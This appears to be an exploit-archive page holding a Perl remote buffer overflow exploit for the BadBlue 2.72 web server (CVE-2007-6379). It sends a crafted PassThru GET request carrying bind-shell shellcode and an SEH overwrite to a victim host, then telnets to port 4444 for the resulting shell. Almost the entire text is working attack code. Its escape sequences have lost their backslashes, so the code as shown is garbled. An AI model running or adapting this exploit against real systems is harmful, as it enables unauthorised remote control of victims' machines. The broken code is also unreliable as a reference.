BadBlue 2.72 PassThru Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BadBlue 2.72 PassThru Remote Buffer Overflow Exploit
# Published : 2007-12-24
# Author : Jacopo Cervini
# Previous Title : March Networks DVR 3204 Logfile Information Disclosure Exploit
# Next Title : MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065)
#!/usr/bin/perl -w
# http://aluigi.altervista.org/adv/badblue-adv.txt
# http://www.securityfocus.com/bid/26803
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379
# exploit for stack overflow in badblue 2.72
# 
#  Credit to Luigi Auriemma
#  Jacopo Cervini acaro@jervus.it
#  22/12/2007  
# 
#  
# 

use IO::Socket;

if(!($ARGV[1]))
{
 print "Usage: badblue-272-seh.pl <victim> <port>nn";
 exit;
}

# metasploit win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum

my $shellcode  =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e".
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38".
"x4ex46x46x52x46x42x4bx48x45x34x4ex53x4bx48x4ex57".
"x45x50x4ax47x41x50x4fx4ex4bx58x4fx54x4ax41x4bx48".
"x4fx45x42x52x41x30x4bx4ex49x34x4bx58x46x33x4bx48".
"x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x38x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e".
"x46x4fx4bx53x46x45x46x32x4ax52x45x37x45x4ex4bx38".
"x4fx35x46x52x41x30x4bx4ex48x36x4bx58x4ex30x4bx54".
"x4bx58x4fx45x4ex31x41x50x4bx4ex43x50x4ex42x4bx38".
"x49x58x4ex46x46x52x4ex31x41x46x43x4cx41x53x4bx4d".
"x46x56x4bx58x43x44x42x33x4bx48x42x54x4ex30x4bx38".
"x42x57x4ex51x4dx4ax4bx58x42x54x4ax50x50x45x4ax46".
"x50x48x50x34x50x30x4ex4ex42x35x4fx4fx48x4dx48x56".
"x43x35x48x46x4ax56x43x43x44x43x4ax36x47x47x43x57".
"x44x33x4fx45x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e".
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x38x45x4e".
"x48x36x41x58x4dx4ex4ax30x44x30x45x55x4cx36x44x50".
"x4fx4fx42x4dx4ax46x49x4dx49x30x45x4fx4dx4ax47x55".
"x4fx4fx48x4dx43x45x43x55x43x45x43x35x43x55x43x34".
"x43x45x43x44x43x45x4fx4fx42x4dx48x36x4ax56x41x51".
"x4ex35x48x46x43x35x49x38x41x4ex45x39x4ax46x46x4a".
"x4cx51x42x37x47x4cx47x35x4fx4fx48x4dx4cx36x42x51".
"x41x35x45x55x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x42".
"x49x4ex47x35x4fx4fx48x4dx43x35x45x55x4fx4fx42x4d".
"x4ax46x45x4ex49x44x48x48x49x34x47x55x4fx4fx48x4d".
"x42x35x46x35x46x35x45x45x4fx4fx42x4dx43x49x4ax56".
"x47x4ex49x57x48x4cx49x47x47x55x4fx4fx48x4dx45x45".
"x4fx4fx42x4dx48x56x4cx56x46x56x48x56x4ax46x43x46".
"x4dx46x49x38x45x4ex4cx46x42x55x49x55x49x32x4ex4c".
"x49x38x47x4ex4cx36x46x34x49x58x44x4ex41x33x42x4c".
"x43x4fx4cx4ax50x4fx44x34x4dx52x50x4fx44x34x4ex42".
"x43x59x4dx58x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax56".
"x44x37x50x4fx43x4bx48x51x4fx4fx45x47x46x44x4fx4f".
"x48x4dx4bx35x47x45x44x55x41x55x41x55x41x55x4cx56".
"x41x50x41x45x41x35x45x45x41x55x4fx4fx42x4dx4ax56".
"x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46".
"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx58x47x55x4ex4f".
"x43x38x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d".
"x4ax46x42x4fx4cx48x46x50x4fx35x43x55x4fx4fx48x4d".
"x4fx4fx42x4dx5a";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "can't connect to $ARGV[0] on port $ARGV[1]";
$pad0 = "x41"x407;
$pad = "x41"x3000;
$seh = "xb6x34x03x10"; # pop ebx pop ecx ret in ext.dll
$jmp = "x90x90xebx08";
$longjmp = "xe9x6exf1xffxff";
$pad1 = "x43"x8;
$pad2 = "x43"x59;



$exploit = "GET /ext.dll?mfcisapicommand=PassThru&". $pad0 . $shellcode . $pad . $jmp . $seh . $pad1 .$longjmp . $pad2. "HTTP/1.0"."rnrn";



print $victim $exploit;

print " + Malicious GET request sent ...n";

sleep(1);

print "Done.n";

close($victim);

$host = $ARGV[0];
print " + Connect on port 4444 of $host ...n";
sleep(2);
system("telnet $host 4444");
exit;

# www.Syue.com [2007-12-24]